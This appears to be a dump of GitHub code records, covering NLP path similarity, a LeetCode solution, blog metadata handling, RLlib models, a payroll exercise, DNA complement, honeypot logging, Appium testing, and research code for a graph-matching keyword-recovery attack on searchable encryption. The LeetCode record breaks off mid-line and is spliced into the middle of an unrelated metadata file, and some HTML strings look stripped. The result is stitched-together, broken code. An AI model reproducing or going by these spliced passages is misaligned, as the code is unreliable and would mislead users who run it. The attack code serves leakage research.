{b} after minfreq filtering.\\n'\n s = s.format(a=args[0], b=args[1])\n f.write(s)\n\n s = 'Found {a} path instances, {b} after minfreq filtering.\\n'\n s = s.format(a=args[2], b=args[3])\n f.write(s)\n f.write('\\n')\n\n def _find_k_similar(self, phrase, sim, k=5):\n \"\"\"Find the k most similar paths.\n\n If phrase does not in the database, reutrn None\n\n Args:\n phrase: str\n sim: Similarity\n k: int\n\n Returns:\n a list of tuple with size of k.\n Each tuple contains the path and corrsponding score.\n \"\"\"\n if phrase not in self._database:\n return None\n\n reval = [(path, sim.PathSim(phrase, path)) for path in self._database]\n reval.sort(key=lambda x: x[-1], reverse=True)\n # To deal with tie cases.\n value = reval[k-1][-1]\n reval = [v for v in reval if v[-1] >= value]\n return reval\n\n def _write_result(self, f, phrase, result):\n \"\"\"Write thr result into files.\n\n Args:\n f: file\n phrase: str\n result: list(tuple(path, score))\n \"\"\"\n s = 'MOST SIMILAR RULES FOR: {a}\\n'.format(a=phrase)\n n = 'This phrase is not in the triple database.\\n'\n t = '{a}. {b}\\t{c}\\n'\n f.write(s)\n if result is None:\n f.write(n)\n else:\n for i, item in enumerate(result):\n path = str(item[0])\n score = str(item[-1])\n tt = t.format(a=str(i+1), b=path, c=score)\n f.write(tt)\n f.write('\\n')\n\n\nif __name__ == '__main__':\n runner = DIRT()\n corpus_path = sys.argv[1]\n test_path = sys.argv[2]\n minfreq = int(sys.argv[3])\n runner.run(corpus_path, test_path, minfreq)\n","repo_name":"flyaway1217/CS-6390-Information-Extraction","sub_path":"program #2 (DIRT)/source/dirt.py","file_name":"dirt.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10739050766","text":"#\n# @lc app=leetcode.cn id=92 lang=python3\n#\n# [92] 反转链表 II\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode: \n cnt = 1\n dummy = ListNode()\n dummy.next = head\n pre = dummy\n while pre and cnt1 category for meta: %s.\" % self.__metaDict)\n return self.__metaDict['category'][0]\n\n def isTagPresent(self, strTag):\n return self.__metaDict['tags'].count(strTag) > 0\n\n def loadFile(self, filename):\n #print(\"loadFile: \" + filename)\n\n fh = open(filename, 'r')\n metaLines = fh.readlines()\n fh.close()\n\n #.meta file format to python dictionary\n for line in metaLines:\n if line.find(':') == -1:\n continue\n assert( len(line.split(':')) == 2 )\n metaTag = line.split(':')[0]\n self.__metaDict[metaTag] = []\n for metaTagItem in line.split(':')[1].split(','):\n if metaTagItem.strip() != '':\n self.__metaDict[metaTag].append(metaTagItem.strip())\n\n def toHtml(self):\n\n htmlMeta = '

    Page Metadata

    '\n for key, val in self.__metaDict.iteritems():\n htmlMeta = htmlMeta + '%s: %s
    ' % (key, val)\n htmlMeta = htmlMeta + '
    '\n\n return str(htmlMeta)\n\nclass WebdocEntry:\n\n def __init__(self):\n self.__title = None\n\n def __cmp__(self, other):\n if self.getDate() > other.getDate():\n return -1\n else:\n return 1\n\n def getTitle(self):\n return self.__title\n\n def getBriefDescription(self):\n return self.getTitle()\n\n def getTags(self):\n return self.__metadata.getTags()\n\n def getEntrySubUrl(self):\n return self.__entrySubUrl\n\n def getDate(self):\n return self.__metadata.getDate()\n\n def getCategory(self):\n return self.__metadata.getCategory()\n\n def getMetaDescription(self):\n return self.getTitle()\n\n def getMetaKeywords(self):\n str = \", \".join(self.__metadata.getTags())\n str = self.__metadata.getCategory() + \", \" + str\n return str\n\n def isWebReady(self):\n if self.__metadata.isTagPresent('noweb'):\n return False\n else:\n return True\n\n def toHtml(self):\n assert self.__html != None\n return self.__html\n\n def __tryFindTitleFromHtml(self, html):\n title = None\n\n #Use the first '

    ' tag found in html\n for html_line in html.splitlines():\n m = re.match(r\"

    (.*)

    \", html_line)\n if m is not None and len(m.groups()) is not 0:\n title = m.groups()[0]\n break\n\n return title\n\n def loadFromDataFolder(self, dataFolder):\n\n #Locate html file\n path = ws_globals.blogGeneratedFolder + '/' + dataFolder.lower()\n files = []\n\n # Correct a path that came lower-cased.\n if not os.path.isdir(path):\n allF = os.listdir(ws_globals.blogGeneratedFolder)\n fMap = {x.lower(): x for x in allF}\n path = ws_globals.blogGeneratedFolder + '/' + fMap[dataFolder.lower()]\n\n if os.path.isdir(path):\n files = os.listdir(path)\n else:\n raise Exception(\"Cannot find path: %s (df: %s).\" % (path, dataFolder))\n\n htmlFile = None\n for file in files:\n if file.find('.html') != -1:\n htmlFile = file\n\n #Copy to html answer\n if htmlFile is not None:\n fh = open(path + '/' + htmlFile, 'r')\n self.__html = fh.read()\n fh.close()\n\n if self.__html is None:\n raise Exception(\"Could not find html\")\n\n #Provide a sub-url\n self.__entrySubUrl = dataFolder\n\n #Try to provide a title from html\n #@tag Should put tags there, as well as provide a special metadata field in order to override\n #@tag this is done at RUNTIME! --> move this to pre-computed data!\n self.__title = dataFolder + ': ' + str(self.__tryFindTitleFromHtml(self.__html))\n #Failback = use source folder as title\n if self.__title is None:\n self.__title = dataFolder\n\n #Insert footer with metadata\n metaFile = None\n for file in files:\n if file.find('.meta') != -1:\n metaFile = file\n if metaFile is not None:\n webdocMetadata = WebdocMetadata()\n webdocMetadata.loadFile(path + '/' + metaFile)\n self.__metadata = webdocMetadata\n\n self.__html = self.__html + webdocMetadata.toHtml()\n","repo_name":"modu/website_grokit_ca","sub_path":"ws_root/ws_django/webdoc/webdoc_entry.py","file_name":"webdoc_entry.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34027741811","text":"import gym\n\nfrom ray.rllib.utils.framework import try_import_tf\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.models.tf.tf_modelv2 import TFModelV2\nfrom ray.rllib.models.tf import FullyConnectedNetwork\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.models.preprocessors import get_preprocessor\n\n\ntf = try_import_tf()\n\n\ndef observation_adapter(obs: dict):\n # convert obs to an array\n features = []\n for key, value in obs.items():\n if len(value.shape) > 3:\n continue\n features.append(value)\n features_array = tf.concat(features, axis=-1)\n\n # move axis: (height, width, channel)\n features_array = tf.transpose(features_array, perm=[0, 2, 1])\n res = {\"feature_input\": features_array}\n if obs.get(\"img_gray\", None) is not None:\n img_gray = tf.transpose(obs[\"img_gray\"], perm=[0, 2, 3, 1])\n res[\"vision_input\"] = img_gray\n return res\n\n\ndef get_shapes(space_dict: gym.spaces.Dict):\n feature_dim, vision_shape = 0, None\n stack_size = 1\n for key, space in space_dict.spaces.items():\n if key == \"img_gray\":\n vision_shape = space.shape\n else:\n feature_dim += space.shape[-1]\n stack_size = space.shape[0]\n\n if vision_shape is not None:\n return (feature_dim, stack_size), vision_shape[1:] + (vision_shape[0],)\n else:\n return (feature_dim, stack_size), None\n\n\nclass DictCNN(TFModelV2):\n NAME = \"DictCNN\"\n\n def __init__(\n self, obs_space, action_space, num_outputs, model_config, name, **kwargs\n ):\n super(DictCNN, self).__init__(\n obs_space, action_space, num_outputs, model_config, 
name\n )\n custom_model_config = model_config[\"custom_model_config\"]\n obs_space_dict = kwargs.get(\"obs_space_dict\", None) or custom_model_config.get(\n \"obs_space_dict\", None\n )\n assert obs_space_dict is not None\n\n # convert mix observation to ...\n feature_shape, vision_shape = get_shapes(obs_space_dict)\n feature_input = tf.keras.Input(feature_shape)\n vision_input = (\n tf.keras.Input(vision_shape) if vision_shape is not None else None\n )\n\n feature_conv_1 = tf.keras.layers.Conv1D(\n filters=16, kernel_size=3, activation=tf.nn.tanh\n )(feature_input)\n feature_flat = tf.keras.layers.Flatten()(feature_conv_1)\n\n vision_flat = None\n if vision_shape is not None:\n vision_conv_1 = tf.keras.layers.Conv2D(\n filters=32, kernel_size=4, strides=2, activation=tf.nn.tanh\n )(vision_input)\n vision_conv_2 = tf.keras.layers.Conv2D(\n filters=64, kernel_size=11, strides=1, activation=tf.nn.tanh\n )(vision_conv_1)\n vision_flat = tf.keras.layers.Flatten()(vision_conv_2)\n\n if vision_flat is not None:\n self._use_vision = True\n concat_state = tf.keras.layers.Concatenate(axis=-1)(\n [feature_flat, vision_flat]\n )\n else:\n self._use_vision = False\n concat_state = feature_flat\n value_layer = tf.keras.layers.Dense(units=1)(concat_state)\n value_layer = tf.reshape(value_layer, (-1,))\n # output_layer = tf.keras.layers.Dense(units=64, activation=tf.nn.relu)(concat_state)\n output_layer = tf.keras.layers.Dense(units=num_outputs)(concat_state)\n\n self.base_model = (\n tf.keras.Model([feature_input, vision_input], [output_layer, value_layer])\n if vision_shape is not None\n else tf.keras.Model([feature_input], [output_layer, value_layer])\n )\n self.register_variables(self.base_model.variables)\n self._value_out = None\n\n @override(TFModelV2)\n def value_function(self):\n return self._value_out\n\n def forward(self, input_dict, state, seq_lens):\n obs = input_dict[\"obs\"]\n obs = observation_adapter(obs)\n inputs = (\n [obs[\"feature_input\"], obs[\"vision_input\"]]\n if self._use_vision\n else [obs[\"feature_input\"]]\n )\n model_out, self._value_out = self.base_model(inputs)\n return model_out, state\n\n\nclass FCModel(FullyConnectedNetwork):\n NAME = \"FCModel\"\n\n\nclass CCModel(TFModelV2):\n NAME = \"CCModel\"\n CRITIC_OBS = \"CRITIC_OBS\"\n\n def __init__(\n self, obs_space, action_space, num_outputs, model_config, name, **kwargs\n ):\n super(CCModel, self).__init__(\n obs_space, action_space, num_outputs, model_config, name\n )\n\n # ordered dict\n agent_number = 4\n critic_obs = gym.spaces.Dict(\n {\n **{f\"AGENT-{i}\": obs_space for i in range(agent_number)},\n **{f\"AGENT-{i}-action\": action_space for i in range(agent_number)},\n }\n )\n\n self.critic_preprocessor = get_preprocessor(critic_obs)(critic_obs)\n self.obs_preprocessor = get_preprocessor(obs_space)(obs_space)\n self.act_preprocessor = get_preprocessor(action_space)(action_space)\n model_config[\"custom_model_config\"] = dict()\n # inner network\n self.action_model = DictCNN(\n obs_space,\n action_space,\n num_outputs,\n model_config,\n name + \"_action\",\n **kwargs,\n )\n self.value_model = FullyConnectedNetwork(\n gym.spaces.Box(low=-1e10, high=1e10, shape=self.critic_preprocessor.shape),\n action_space,\n 1,\n model_config,\n name + \"_vf\",\n )\n self.register_variables(self.action_model.variables())\n self.register_variables(self.value_model.variables())\n\n def forward(self, input_dict, state, seq_lens):\n return self.action_model.forward(input_dict, state, seq_lens)\n\n def central_value_function(self, 
obs):\n # TODO(ming): make inputs as dicts is better\n value, _ = self.value_model({\"obs\": obs})\n return value\n\n @override(TFModelV2)\n def value_function(self):\n return self.action_model.value_function()\n\n\nModelCatalog.register_custom_model(CCModel.NAME, CCModel)\nModelCatalog.register_custom_model(DictCNN.NAME, DictCNN)\nModelCatalog.register_custom_model(FCModel.NAME, FCModel)\n","repo_name":"Taospirit/SMARTS_Track-2","sub_path":"starter_kit/submission/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} {"seq_id":"72204742134","text":"N_identificación=input(\"digite su numero de indentificacion: \")\nprint(N_identificación)\nNombre=\"kevin\"\napellidos=\"Ballesteros Carreño\"\ndirección=input(\"digite su direccion: \")\nteléfono=\"3112078657\"\nEdad=int(input(\"digite su edad\"))\nestado_civil=(input(\"digite su estado civil: \"))\nn_hijos=int(input(\"ingrese el numero de hijos: \"))\nEstatura=input(\"ingrese su estatura: cm\")\nFecha_de_contratación=\"06/06/2020\"\nsueldo_basico= float(input(\"ingrese su sueldo basico: \"))\ndias_laborados=int(input(\"ingrese los dias laborados: \"))\nprint(N_identificación,\" \\n\",Nombre,\" \",apellidos,\" \\n\",dirección,\" \\n\",teléfono,\" \\n\",Edad,\" \\n\",estado_civil,\" \\n\",n_hijos,\" \\n\",Estatura,\" \\n\",Fecha_de_contratación,\" \\n\",sueldo_basico,\" \\n\",dias_laborados)\n\nif Edad >= 55:\n bono= sueldo_basico * 0.05\n total = sueldo_basico + bono\n print(\"el bono de pension es =${:,.0f} y el salario a pagar es =${:,.0f}\".format(bono , total))\nelse:\n print(f\"No tiene bono, su salario es =${sueldo_basico:,.0f}\")\n\nif estado_civil == \"casado\" and n_hijos > 0:\n print(\"habilitado para viaje anual en diciembre\")\nelse:\n print(\"no tiene opcion de viaje en diciembre\")\n\nif sueldo_basico >= 1000000 and sueldo_basico < 1500000:\n com2 = sueldo_basico * 0.02\n print(f\"Tiene un bono de comisión del 2%: {com2:,.0f}\")\n\nif sueldo_basico >= 1500001 and sueldo_basico < 2000000:\n com5 = sueldo_basico * 0.05\n print(f\"Tiene un bono de comisión del 5%: {com5:,.0f}\")\n \nif dias_laborados > 20 and sueldo_basico < 1000000:\n print(\"Aplica para bono de alimentación\")\nelse:\n print(\"En esta oportunidad no aplicas para bono de alimentación\")\n ","repo_name":"kevballe/talleres-del-curso-de-programacion-kevin-balle","sub_path":"taller1.py","file_name":"taller1.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"28476743812","text":"# Track: Bioinformatics Stronghold\r\n# Problem: Complementing a Strand of DNA\r\n# ID: REVC\r\n\r\n# Input: A DNA string 's' having length at most 1000 nt\r\n# Output: The reverse complement 's^c' of 's'\r\n\r\n# --- Functions --- #\r\ndef reverse_strand(strand):\r\n return strand[::-1]\r\n\r\ndef complement_strand(strand):\r\n reverse = ''\r\n give_me_a_complement_of = { 'A' : 'T', 'T' : 'A', 'G' : 'C', 'C' : 'G' }\r\n for nucleotide in reverse_strand(strand):\r\n reverse += give_me_a_complement_of[nucleotide]\r\n return reverse\r\n\r\n# --- Main program --- #\r\nwith open('./datasets/rosalind_revc.txt', 'r') as f:\r\n dataset = f.read().splitlines()[0]\r\n\r\nwith open('./outputs/rosalind_revc_1_output.txt', 'w') as f:\r\n
f.write(complement_strand(dataset))\r\n","repo_name":"petarnikolovski/rosalind-solutions","sub_path":"bioinformatics-stronghold/revc.py","file_name":"revc.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38933890245","text":"import numpy as np\r\nfrom tqdm import tqdm\r\nimport os\r\nimport stat\r\nimport subprocess\r\nclass GraphMattacker:\r\n    def __init__(self,sim_kw_d,real_td_d,alpha = 0.5,alg=\"PATH\",init=\"unif\"):\r\n        self.sim_kw_d = sim_kw_d\r\n        self.real_td_d = real_td_d\r\n        self.td_num = len(self.real_td_d)\r\n        #self.real_td_d=np.vstack((self.real_td_d,np.zeros((len(self.sim_kw_d)-len(self.real_td_d),len(self.real_td_d[0])))))\r\n        \r\n        self.real_M = np.dot(self.real_td_d,self.real_td_d.T)/len(self.real_td_d[0])\r\n        self.sim_M = np.dot(self.sim_kw_d,self.sim_kw_d.T)/len(self.sim_kw_d[0])\r\n\r\n        self.tdid_2_kwsid = {}\r\n        self.unrec_td_set = set([i for i in range(len(self.real_td_d))])\r\n        self.id_known_kws=None\r\n        self.id_queried_kws=None\r\n\r\n        self.alpha = alpha\r\n        self.alg = alg\r\n        self.init = init\r\n\r\n        \r\n\r\n    def attack(self):\r\n        G = self.sim_M\r\n        np.fill_diagonal(G,0)\r\n        H = self.real_M\r\n        np.fill_diagonal(H,0)\r\n        C = self.built_C()\r\n        if not os.path.exists(\"./src_graphm/temp/graphm\"):\r\n            os.makedirs(\"./src_graphm/temp/graphm\")\r\n        with open(\"src_graphm/temp/graphm/G1.txt\",\"wb\") as f:\r\n            for row in G:\r\n                row_str = ' '.join(\"{:.6f}\".format(val) for val in row) + '\\n'\r\n                f.write(row_str.encode('ascii'))\r\n        with open(\"src_graphm/temp/graphm/G2.txt\",\"wb\") as f:\r\n            for row in H:\r\n                row_str = ' '.join(\"{:.6f}\".format(val) for val in row) + '\\n'\r\n                f.write(row_str.encode('ascii'))\r\n        with open(\"src_graphm/temp/graphm/C.txt\",\"wb\") as f:\r\n            for row in C:\r\n                row_str = ' '.join(\"{:.6f}\".format(val) for val in row) + '\\n'\r\n                f.write(row_str.encode('ascii'))\r\n        write_config([self.alg],self.init,self.alpha)\r\n        with open(\"src_graphm/temp/graphm/run_script\", 'w') as f:\r\n            f.write(\"#!/bin/sh\\n\")\r\n            f.write(\"src_graphm/graphm-0.51/bin/graphm src_graphm/temp/graphm/config.txt\\n\")\r\n        st = os.stat(\"src_graphm/temp/graphm/run_script\")\r\n        os.chmod(\"src_graphm/temp/graphm/run_script\", st.st_mode | stat.S_IEXEC)\r\n        subprocess.run([\"src_graphm/temp/graphm/run_script\"], capture_output=True)\r\n        \r\n        with open(\"src_graphm/temp/graphm/X.txt\") as f:\r\n            \r\n            while(f.readline()!=self.alg+\" \\n\"):\r\n                continue\r\n            result = f.readlines()\r\n            result = [int(i) for i in result]\r\n            for i in range(len(result)):\r\n                if result[i]-1 < self.td_num:\r\n                    self.tdid_2_kwsid[result[i]-1] = i\r\n\r\ndef _log_binomial(n, a):\r\n    # log of binomial(n, a*n) via the Stirling approximation\r\n    if a == 0 or a == 1:\r\n        return 0\r\n    elif a < 0 or a > 1:\r\n        raise ValueError(\"a cannot be negative or greater than 1 ({})\".format(a))\r\n    else:\r\n        entropy = -a * np.log(a) - (1 - a) * np.log(1 - a)\r\n        return n * entropy - 0.5 * np.log(2 * np.pi * n * a * (1 - a))\r\ndef compute_log_binomial_probability_matrix(ntrials, probabilities, observations):\r\n    \"\"\"\r\n    This code is from https://github.com/simon-oya/USENIX21-sap-code/blob/master/attacks.py\r\n    Computes the logarithm of binomial probabilities of each pair of probabilities and observations.\r\n    :param ntrials: number of binomial trials\r\n    :param probabilities: vector with probabilities\r\n    :param observations: vector with integers (observations)\r\n    :return log_matrix: |probabilities|x|observations| matrix with the log binomial probabilities\r\n    \"\"\"\r\n    probabilities = np.array(probabilities)\r\n    probabilities[probabilities == 0] = min(probabilities[probabilities > 0]) / 100  # To avoid 
numerical errors. An error would mean the adversary information is very off.\r\n    log_binom_term = np.array([_log_binomial(ntrials, obs / ntrials) for obs in observations])  # ROW TERM\r\n    column_term = np.array([np.log(probabilities) - np.log(1 - np.array(probabilities))]).T  # COLUMN TERM\r\n    last_term = np.array([ntrials * np.log(1 - np.array(probabilities))]).T  # COLUMN TERM\r\n    log_matrix = log_binom_term + np.array(observations) * column_term + last_term\r\n    return log_matrix\r\n\r\ndef write_config(Alg,init,alpha):\r\n\r\n    config_text = \"\"\"//*********************GRAPHS**********************************\r\n//graph_1,graph_2 are graph adjacency matrices,\r\n//C_matrix is the matrix of local similarities between vertices of graph_1 and graph_2.\r\n//If graph_1 is NxN and graph_2 is MxM then C_matrix should be NxM\r\ngraph_1=src_graphm/temp/graphm/G1.txt s\r\ngraph_2=src_graphm/temp/graphm/G2.txt s\r\nC_matrix=src_graphm/temp/graphm/C.txt s\r\n//*******************ALGORITHMS********************************\r\n//used algorithms and what should be used as initial solution in corresponding algorithms\r\nalgo={alg:s} s\r\nalgo_init_sol={init:s} s\r\nsolution_file=solution_im.txt s\r\n//coefficient of linear combination between (1-alpha_ldh)*||graph_1-P*graph_2*P^T||^2_F +alpha_ldh*C_matrix\r\nalpha_ldh={alpha:.6f} d\r\ncdesc_matrix=A c\r\ncscore_matrix=A c\r\n//**************PARAMETERS SECTION*****************************\r\nhungarian_max=10000 d\r\nalgo_fw_xeps=0.01 d\r\nalgo_fw_feps=0.01 d\r\n//0 - just add a set of isolated nodes to the smallest graph, 1 - double size\r\ndummy_nodes=0 i\r\n// fill for dummy nodes (0.5 - these nodes will be connected with all other by edges of weight 0.5(min_weight+max_weight))\r\ndummy_nodes_fill=0 d\r\n// fill for linear matrix C, usually that's the minimum (dummy_nodes_c_coef=0),\r\n// but may be the maximum (dummy_nodes_c_coef=1)\r\ndummy_nodes_c_coef=0.01 d\r\n\r\nqcvqcc_lambda_M=10 d\r\nqcvqcc_lambda_min=1e-5 d\r\n\r\n\r\n//0 - all matching are possible, 1-only matching with positive local similarity are possible\r\nblast_match=0 i\r\nblast_match_proj=0 i\r\n\r\n\r\n//****************OUTPUT***************************************\r\n//output file and its format\r\nexp_out_file=src_graphm/temp/graphm/X.txt s\r\nexp_out_format=Permutation s\r\n//other\r\ndebugprint=0 i\r\ndebugprint_file=debug.txt s\r\nverbose_mode=1 i\r\n//verbose file may be a file or just a screen:cout\r\nverbose_file=cout s\r\n\"\"\".format(alg=\" \".join(alg for alg in Alg), init=\" \".join(init for _ in Alg),alpha=alpha)\r\n    with open(\"src_graphm/temp/graphm/config.txt\",\"w\") as f:\r\n        f.write(config_text)\r\n\r\n    \r\n","repo_name":"JigsawAttack/JigsawAttack","sub_path":"attack/graphmattack.py","file_name":"graphmattack.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002081974","text":"# -*- coding: utf-8 -*-\n\"\"\"Real-time stock information\n\n\"\"\"\n\nimport json\nfrom bs4 import BeautifulSoup\nimport math\nfrom datetime import datetime\n\nfrom eaglet.decorator import param_required\n#from wapi import wapi_utils\nfrom eaglet.core.cache import utils as cache_util\nfrom db.mall import models as mall_models\nfrom db.mall import promotion_models\n#import resource\nfrom eaglet.core import watchdog\nfrom business import model as business_model\nimport settings\n\n\nclass RealtimeStock(business_model.Model):\n\t\"\"\"\n\tReal-time stock information\n\t\"\"\"\n\t__slots__ = 
(\n\t\t'model2stock',\n\t)\n\n\t@staticmethod\n\t@param_required(['product_id'])\n\tdef from_product_id(args):\n\t\t\"\"\"\n\t\tFactory method: get a product's real-time stock info by product_id\n\n\t\t@param[in] product_id: the product id\n\n\t\t@return a RealtimeStock business object\n\t\t\"\"\"\n\t\tproduct_id = args['product_id']\n\t\tmodels = mall_models.ProductModel.select().dj_where(product=product_id, is_deleted=False)\n\t\trealtime_stock = RealtimeStock()\n\t\trealtime_stock.init(models)\n\n\t\treturn realtime_stock\n\n\t@staticmethod\n\t@param_required(['model_ids'])\n\tdef from_product_model_ids(args):\n\t\t\"\"\"\n\t\tFactory method: get stock info for the given product model ids\n\n\t\t@param[in] model_ids: the product model ids\n\n\t\t@return a RealtimeStock business object\n\t\t\"\"\"\n\t\tmodel_ids = args['model_ids']\n\t\tmodels = mall_models.ProductModel.select().dj_where(id__in=model_ids, is_deleted=False)\n\t\trealtime_stock = RealtimeStock()\n\t\trealtime_stock.init(models)\n\n\t\treturn realtime_stock\n\n\tdef __init__(self):\n\t\tbusiness_model.Model.__init__(self)\n\n\tdef init(self, models):\n\t\tself.model2stock = dict()\n\t\tfor model in models:\n\t\t\tmodel_data = dict()\n\t\t\tmodel_data[\"stocks\"] = model.stocks\n\t\t\tmodel_data[\"stock_type\"] = model.stock_type\n\t\t\tself.model2stock[model.id] = model_data\n\n\tdef to_dict(self, **kwargs):\n\t\treturn self.model2stock\n\n\t@staticmethod\n\t@param_required(['product_id', 'model_name'])\n\tdef from_product_model_name(args):\n\t\t\"\"\"\n\t\tFactory method: get stock info by product_id and model name\n\n\t\t@param[in] product_id: the product id\n\t\t@param[in] model_name: the model (SKU) name\n\n\t\t@return a RealtimeStock business object\n\t\t\"\"\"\n\t\tproduct_id = args['product_id']\n\t\tmodel_name = args['model_name']\n\t\tmodels = mall_models.ProductModel.select().dj_where(product_id=product_id, name=model_name,is_deleted=False)\n\t\trealtime_stock = RealtimeStock()\n\t\trealtime_stock.init(models)\n\n\t\treturn realtime_stock\n\n\n\n","repo_name":"chengdg/apiserver","sub_path":"business/mall/realtime_stock.py","file_name":"realtime_stock.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17720921556","text":"from Tkinter import *\nimport ttk\n\n\nclass AdminBanWindow:\n    def __init__(self, main_window):\n        self.master = Toplevel()\n        self.main_window = main_window\n\n        self.master.geometry('1100x550')\n        self.master.resizable(width=False, height=False)\n\n        self.master.title(\"Ban Management\")\n\n        self.FILES_FRAME = ttk.LabelFrame(self.master, text='Files', height=460, width=890)\n        self.FILES_FRAME.place(relx=0, rely=0.001)\n\n        self.COLUMNS = ('Category', 'File', 'Size', 'Uploader', 'Date')\n        self.FILES = ttk.Treeview(self.FILES_FRAME, columns=self.COLUMNS, show='headings', height=21)\n        FILES_ysb = ttk.Scrollbar(orient=VERTICAL, command=self.FILES.yview)\n        xsb = ttk.Scrollbar(orient=HORIZONTAL, command=self.FILES.xview)\n        self.FILES['yscroll'] = FILES_ysb.set\n        self.FILES['xscroll'] = xsb.set\n\n        self.FILES.grid(row=0, column=0)\n        FILES_ysb.grid(in_=self.FILES_FRAME, row=0, column=1, sticky=NS)\n\n","repo_name":"edensit/--ChatClient","sub_path":"GUI/admin_ban_window.py","file_name":"admin_ban_window.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31584468700","text":"import os\nimport threading\n\nfrom twisted.python import log\n\nLOGFILE = 'attempts.txt'\nLOGFILE_LOCK = threading.Lock()\n\ndef writetosession(ip,message):\n    LOGFILE_LOCK.acquire()\n    originaldirectory = str(os.getcwd())\n    
directory = originaldirectory +\"/victims\"\n    newfile = directory+\"/victim-\"+ip+\".txt\"\n    f = open(newfile,'a')\n    f.write(message)\n    f.close()\n    LOGFILE_LOCK.release()\n\ndef normalwrite(file,message):\n    LOGFILE_LOCK.acquire()\n    originaldirectory = str(os.getcwd())\n    directory = originaldirectory +\"/victims\"\n    newfile = directory +\"/\" +file\n    f = open(newfile,'a')\n    f.write(message)\n    f.close()\n    LOGFILE_LOCK.release()\n\ndef start_logging():\n    originaldirectory = str(os.getcwd())\n    newfile = originaldirectory + \"/percuma.log\"\n    log.startLogging(open(newfile, 'a'))\n","repo_name":"fajarprstio/percuma_ta","sub_path":"core/percuma_logging.py","file_name":"percuma_logging.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10026402422","text":"import logging\nimport os\n\nfrom ._version import get_versions\n\n__version__ = get_versions()[\"version\"]\ndel get_versions\n\n#\n# Basic logger configuration\n#\n\n\ndef get_logger(name=None):\n    \"\"\"Return a logger to use\"\"\"\n    return logging.getLogger(\"reproschema\" + (\".%s\" % name if name else \"\"))\n\n\ndef set_logger_level(lgr, level):\n    if isinstance(level, int):\n        pass\n    elif level.isnumeric():\n        level = int(level)\n    elif level.isalpha():\n        level = getattr(logging, level)\n    else:\n        lgr.warning(\"Do not know how to treat loglevel %s\" % level)\n        return\n    lgr.setLevel(level)\n\n\n_DEFAULT_LOG_FORMAT = \"%(asctime)s:%(levelname)s:%(name)s: %(message)s\"\n\nlgr = get_logger()\n# Basic settings for output, for now just basic\nset_logger_level(lgr, os.environ.get(\"REPROSCHEMA_LOG_LEVEL\", logging.INFO))\nFORMAT = \"%(asctime)-15s [%(levelname)8s] %(message)s\"\nlogging.basicConfig(format=FORMAT)\n\ntry:\n    import etelemetry\n\n    etelemetry.check_available_version(\"repronim/reproschema-py\", __version__, lgr=lgr)\nexcept Exception as exc:\n    lgr.warning(\n        \"Failed to check for a more recent version available with etelemetry: %s\", exc\n    )\n","repo_name":"ReproNim/reproschema-py","sub_path":"reproschema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"30641927582","text":"# author_='Yuxuehong';\n# date: 2023/8/18 13:46\n\n\"\"\"\nThe whole script needs to:\nbuild the test cases\nrun the test cases\ngenerate the test report with pytest-html\n\"\"\"\n\nfrom 封装的代码 import *\nimport time\nimport random\n\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\nfrom Options import Options\n\n\ndef test():\n    \"\"\"\n    Verify that the book found through the search feature is the same book obtained from the book store\n    :return:\n    \"\"\"\n    \"\"\"\n    a. Open the dushuwu app and enter the book store\n    \"\"\"\n    # 1. Connection method 1: the activity name and package name are known\n    # caps = {\n    #     \"appium:deviceName\": \"emulator-5554\",\n    #     \"platformName\": \"Android\",\n    #     \"appium:platformVersion\": \"7.1.2\",\n    #     \"appium:appPackage\": \"com.zhao.myreader\",\n    #     \"appium:appActivity\": \"com.zhao.myreader.ui.home.MainActivity\"\n    # }\n    print(\"hello\")\n    # 2. Connection method 2: the activity name and package name are unknown\n    # Step 1: wrap the driver session request data\n    # caps = {\n    #     \"appium:deviceName\": \"emulator-5554\",\n    #     \"platformName\": \"Android\",\n    #     \"appium:platformVersion\": \"7.1.2\",\n    #     \"app\": \"D://2023-L/python+selenium/app/01app自动化环境的搭建/dushuwu.apk\",\n    #     \"fullReset\": False, # it uninstalls the app after the script finishes; the default False means no uninstall\n    #     # \"noReset\": True, # it clears the app's data before launching the app; the default is False (reset)\n    #     # #\"newCommandTimeout : 20 \", # timeout for the server to wait for client commands; if no command arrives within it, the appium server ends the session\n    # }\n    # {'app': 'D://2023-L/python+selenium/app/01app自动化环境的搭建/dushuwu.apk', 
